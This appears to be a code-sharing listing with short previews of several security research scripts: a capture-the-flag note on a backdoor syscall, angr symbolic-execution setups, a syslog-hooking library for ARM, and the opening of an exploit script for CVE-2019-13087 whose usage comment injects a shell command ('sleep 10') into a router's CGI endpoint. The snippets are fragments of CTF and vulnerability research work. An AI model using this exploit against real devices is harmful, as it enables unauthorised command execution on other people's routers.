This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
''' | |
special backdoor syscall gives flag. | |
Something going on with call/ret too. | |
No ropping? | |
rax = 0x5add011 | |
rdi = ptr -> "please_give_me_flag" | |
rsi = 0x6942069420 | |
''' | |
from pwn import * |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def find_n(haystack, needle, n): | |
st = haystack.find(needle) | |
while st >= 0 and n >= 1: | |
st = haystack.find(needle, st + 1) | |
n -= 1 | |
return st | |
def mod_input(user_input, position, character): | |
user_input = list(user_input) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import angr, claripy | |
from pwn import * | |
file_name = "./launch_code" | |
# 1639874435 | |
# Test nonce | |
nonce = 1639874435 | |
def get_codes(nonce): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import argparse | |
base_url = "http://{}/cgi-bin/internet.cgi" | |
data = {} | |
# python CVE-2019-13087.py 192.168.1.1 admin password 'sleep 10' | |
def main(): | |
parser = argparse.ArgumentParser() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#define _GNU_SOURCE | |
#include <stdarg.h> | |
#include <stdio.h> | |
#include <dlfcn.h> | |
//dockcross-linux-armv5 bash -c '$CC verbal_syslog.c -fPIC -shared -ldl -o Verbal_syslog_static.so' | |
void syslog(int priority, const char* format, ...) | |
{ | |
va_list args; | |
va_start(args, format); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import angr | |
import claripy | |
import argparse | |
#angr logging is way too verbose | |
import logging | |
log_things = ["angr", "pyvex", "claripy", "cle"] | |
for log in log_things: | |
logger = logging.getLogger(log) | |
logger.disabled = True |